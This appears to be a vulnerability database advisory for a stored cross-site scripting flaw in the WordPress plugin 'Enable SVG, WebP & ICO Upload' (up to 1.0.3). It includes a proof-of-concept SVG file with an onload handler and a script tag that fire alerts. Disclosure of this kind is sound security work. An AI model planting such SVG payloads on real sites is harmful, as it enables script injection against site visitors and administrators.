WordPress Plugin Vulnerabilities
Enable SVG, WebP & ICO Upload <= 1.0.3 - Author+ Stored XSS
Description
The plugin does not sanitize SVG file contents, leading to a Cross-Site Scripting vulnerability.
Proof of Concept
1. Upload an SVG file with the following contents. 2. View the SVG file on the frontend and see the alerts. <?xml version="1.0" encoding="UTF-8" standalone="no"?> <svg onload="javascript:alert(/XSS/)" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:cc="http://creativecommons.org/ns#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd" xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" id="svg3013" sodipodi:docname="download_font_awesome.svg"> <script>alert(/XSS2/)</script> </svg>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Mateus Machado Tesser
Submitter
Mateus Machado Tesser
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-06-23 (about 5 months ago)
Added
2023-06-23 (about 5 months ago)
Last Updated
2023-06-23 (about 5 months ago)